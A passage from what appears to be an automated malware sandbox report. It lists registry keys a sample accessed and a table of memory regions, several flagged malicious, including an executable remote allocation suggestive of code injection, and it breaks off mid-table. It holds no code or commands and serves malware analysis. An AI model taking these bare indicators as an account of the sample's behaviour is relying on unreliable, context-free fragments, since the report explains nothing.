HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
CAGFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 455 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
40B9000
trusted library allocation
page read and write
 malicious
911000
heap
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
2774000
trusted library allocation
page read and write
24C4000
trusted library allocation
page read and write
7BB000
heap
page read and write
190000
trusted library allocation
page read and write
671000
heap
page read and write
5FDE000
stack
page read and write
2772000
trusted library allocation
page read and write
4B8E000
stack
page read and write
33B000
heap
page read and write
190000
trusted library allocation
page read and write
8D0000
heap
page read and write
7C1000
heap
page read and write
516000
heap
page read and write
193000
trusted library allocation
page execute and read and write
3650000
heap
page read and write
230000
trusted library allocation
page execute and read and write
8F0000
heap
page read and write
6EE000
stack
page read and write
1C7000
trusted library allocation
page execute and read and write
913000
heap
page read and write
4F3A000
heap
page read and write
45C000
system
page execute and read and write
71F000
heap
page read and write
2BE7000
heap
page read and write
10000000
direct allocation
page read and write
3B6C000
stack
page read and write
2800000
trusted library allocation
page read and write
456000
system
page execute and read and write
250000
heap
page read and write
90C000
heap
page read and write
C50000
trusted library allocation
page read and write
3A2F000
stack
page read and write
501000
heap
page read and write
570000
heap
page read and write
5D9E000
stack
page read and write
23C0000
trusted library allocation
page read and write
2DE4000
heap
page read and write
48C000
heap
page read and write
342000
heap
page read and write
2C06000
heap
page read and write
37AD000
heap
page read and write
51F000
heap
page read and write
CC0000
trusted library allocation
page read and write
338000
heap
page read and write
8B0000
heap
page read and write
2E8000
heap
page read and write
4B10000
heap
page read and write
44D000
heap
page read and write
293B000
trusted library allocation
page read and write
22F0000
trusted library allocation
page read and write
2C10000
heap
page read and write
2F1E000
stack
page read and write
5F8E000
stack
page read and write
1F22000
heap
page read and write
42C0000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
480000
trusted library allocation
page read and write
4F0000
heap
page read and write
2DCD000
heap
page read and write
2C79000
heap
page read and write
2C18000
heap
page read and write
24BF000
stack
page read and write
5EC0000
heap
page read and write
2AF000
heap
page read and write
3EE000
stack
page read and write
37D000
stack
page read and write
64A000
stack
page read and write
B5E000
stack
page read and write
260000
trusted library allocation
page execute and read and write
363000
heap
page read and write
AC0000
heap
page read and write
4FC000
heap
page read and write
23BB000
stack
page read and write
3B2E000
stack
page read and write
44DE000
stack
page read and write
267A000
trusted library allocation
page read and write
290D000
trusted library allocation
page read and write
4E0D000
stack
page read and write
633E000
stack
page read and write
25BA000
trusted library allocation
page read and write
179000
stack
page read and write
24D000
stack
page read and write
4250000
trusted library allocation
page read and write
120000
heap
page read and write
27DA000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
1AA000
trusted library allocation
page read and write
9C000
stack
page read and write
A36000
heap
page read and write
A8F000
stack
page read and write
6A7000
heap
page read and write
48C000
heap
page read and write
1C5000
trusted library allocation
page execute and read and write
4EE4000
heap
page read and write
4A9E000
stack
page read and write
41E000
stack
page read and write
2C16000
heap
page read and write
5090000
heap
page read and write
3EE000
stack
page read and write
3E6000
stack
page read and write
4ED0000
heap
page read and write
420000
trusted library allocation
page read and write
300000
heap
page read and write
2B9E000
heap
page read and write
23C2000
trusted library allocation
page read and write
BF0000
heap
page read and write
180000
trusted library allocation
page read and write
4F8000
heap
page read and write
501000
heap
page read and write
5EE2000
heap
page read and write
5B0000
heap
page read and write
312000
heap
page read and write
230A000
stack
page read and write
4EF6000
heap
page read and write
2D81000
heap
page read and write
273E000
trusted library allocation
page read and write
390000
trusted library allocation
page read and write
4C9000
heap
page read and write
4EE0000
heap
page read and write
360000
heap
page read and write
501000
heap
page read and write
D7C000
stack
page read and write
AA0000
heap
page read and write
358D000
stack
page read and write
2D8000
heap
page read and write
10001000
direct allocation
page execute and read and write
4D8E000
stack
page read and write
6B5000
heap
page read and write
303000
trusted library allocation
page read and write
EB1000
heap
page read and write
136000
heap
page read and write
37BF000
heap
page read and write
312000
heap
page read and write
5D3E000
stack
page read and write | page guard
2C1E000
heap
page read and write
2D70000
heap
page read and write
441000
heap
page read and write
2360000
trusted library allocation
page execute and read and write
1D2F000
stack
page read and write
2F4000
heap
page read and write
444000
heap
page read and write
2C0E000
heap
page read and write
2F0000
heap
page read and write
49AE000
stack
page read and write
51F000
heap
page read and write
971000
heap
page read and write
238E000
stack
page read and write
3CAE000
stack
page read and write
41B000
system
page execute and read and write
4D3E000
stack
page read and write
474000
remote allocation
page execute and read and write
2DCC000
heap
page read and write
8D5000
heap
page read and write
300000
trusted library allocation
page read and write
650000
heap
page read and write
4D7E000
stack
page read and write
2BB0000
heap
page read and write
84E000
heap
page read and write
6C1000
heap
page read and write
2DE5000
heap
page read and write
49D000
heap
page read and write
2C1E000
heap
page read and write
508F000
stack
page read and write
42C0000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
576000
heap
page read and write
3790000
heap
page read and write
2C03000
heap
page read and write
D60000
trusted library allocation
page read and write
4250000
trusted library allocation
page read and write
4F3000
heap
page read and write
5D9000
heap
page read and write
2E5000
heap
page read and write
234E000
stack
page read and write
DA0000
heap
page read and write
194000
trusted library allocation
page read and write
230F000
stack
page read and write
4EE000
heap
page read and write
D10000
trusted library allocation
page read and write
529D000
stack
page read and write
22BF000
stack
page read and write
CB0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
2BEA000
heap
page read and write
23C2000
trusted library allocation
page read and write
202000
trusted library allocation
page read and write
4A0000
trusted library allocation
page read and write
2BBB000
heap
page read and write
2BCF000
stack
page read and write
194000
trusted library allocation
page read and write
3481000
trusted library allocation
page read and write
4F9000
heap
page read and write
11EE000
stack
page read and write
5FAE000
stack
page read and write
51EE000
stack
page read and write
2BC7000
heap
page read and write
102F000
stack
page read and write
28B0000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
2B9E000
heap
page read and write
1AA000
trusted library allocation
page read and write
501000
heap
page read and write
3481000
trusted library allocation
page read and write
2380000
heap
page read and write
455E000
stack
page read and write
420000
heap
page read and write
4EA4000
heap
page read and write
323000
heap
page read and write
19D000
trusted library allocation
page execute and read and write
4C9000
heap
page read and write
380000
heap
page read and write
71A000
heap
page read and write
2D7000
heap
page read and write
71F000
heap
page read and write
4C0000
heap
page read and write
400000
system
page execute and read and write
516000
heap
page read and write
2684000
trusted library allocation
page read and write
94B000
heap
page read and write
290F000
trusted library allocation
page read and write
38CE000
stack
page read and write
3A0000
trusted library allocation
page execute and read and write
3210000
trusted library allocation
page read and write
110E000
stack
page read and write
2E0000
heap
page execute and read and write
2BA6000
heap
page read and write
40A0000
heap
page read and write
2AC000
stack
page read and write
710000
heap
page read and write
594000
heap
page read and write
2C5000
heap
page read and write
400000
heap
page read and write
27DE000
stack
page read and write
2E8000
heap
page read and write
2350000
trusted library allocation
page read and write
4EFE000
heap
page read and write
2C14000
heap
page read and write
37C9000
trusted library allocation
page read and write
51F000
heap
page read and write
2440000
heap
page execute and read and write
42C0000
trusted library allocation
page read and write
42C0000
trusted library allocation
page read and write
44FB000
stack
page read and write
2819000
trusted library allocation
page read and write
B43000
heap
page read and write
2F9000
heap
page read and write
3DE0000
heap
page read and write
234F000
stack
page read and write
E00000
trusted library allocation
page read and write
2F9000
heap
page read and write
542000
heap
page read and write
4C8000
heap
page read and write
42C0000
trusted library allocation
page read and write
306E000
stack
page read and write
B3E000
heap
page read and write
8F5000
heap
page read and write
2B80000
heap
page read and write
10000
heap
page read and write
2BA0000
heap
page read and write
2DE7000
heap
page read and write
308E000
stack
page read and write
122E000
stack
page read and write
96E000
heap
page read and write
2B0000
heap
page read and write
48C000
heap
page read and write
5EC4000
heap
page read and write
2C1F000
heap
page read and write
2BB8000
heap
page read and write
62A0000
heap
page read and write
2B28000
heap
page read and write
2DE5000
heap
page read and write
CC0000
trusted library allocation
page read and write
27DE000
trusted library allocation
page read and write
2BF7000
heap
page read and write
7F2000
heap
page read and write
E3D000
stack
page read and write
2DD5000
heap
page read and write
501E000
stack
page read and write
288000
stack
page read and write
4F0000
heap
page read and write
1C2000
trusted library allocation
page read and write
4EDC000
heap
page read and write
45BE000
stack
page read and write
25D2000
trusted library allocation
page read and write
4B0E000
stack
page read and write
D70000
trusted library allocation
page read and write
39B000
stack
page read and write
4EC8000
heap
page read and write
2CE000
stack
page read and write
40E0000
heap
page read and write
2DDC000
heap
page read and write
20000
heap
page read and write
2866000
trusted library allocation
page read and write
470000
trusted library allocation
page read and write
18A000
stack
page read and write
51E0000
heap
page read and write
51F000
heap
page read and write
4250000
trusted library allocation
page read and write
4CFE000
stack
page read and write
2BEA000
heap
page read and write
D50000
trusted library allocation
page read and write
2BC4000
heap
page read and write
2D80000
heap
page read and write
1E0000
heap
page read and write
E00000
trusted library allocation
page execute and read and write
20000
heap
page read and write
68B000
heap
page read and write
2BFE000
heap
page read and write
360000
trusted library allocation
page read and write
982000
heap
page read and write
42C0000
trusted library allocation
page read and write
330000
heap
page read and write
34A9000
trusted library allocation
page read and write
4C6000
heap
page read and write
49EF000
stack
page read and write
71D000
heap
page read and write
650000
trusted library allocation
page read and write
26C8000
trusted library allocation
page read and write
282A000
trusted library allocation
page read and write
787000
heap
page read and write
3F2F000
stack
page read and write
71F000
heap
page read and write
516000
heap
page read and write
37CF000
heap
page read and write
1E9E000
stack
page read and write
657000
heap
page read and write
42C0000
trusted library allocation
page read and write
2D0E000
stack
page read and write
62B1000
heap
page read and write
427000
heap
page read and write
2F5E000
stack
page read and write
1F04000
heap
page read and write
9B6000
heap
page read and write
B00000
heap
page read and write
2C0C000
stack
page read and write
345000
heap
page read and write
10000
heap
page read and write
69F000
heap
page read and write
400000
system
page execute and read and write
DE0000
trusted library allocation
page read and write
D0D000
stack
page read and write
2DC8000
heap
page read and write
397000
stack
page read and write
112E000
stack
page read and write
2BA3000
heap
page read and write
7A5000
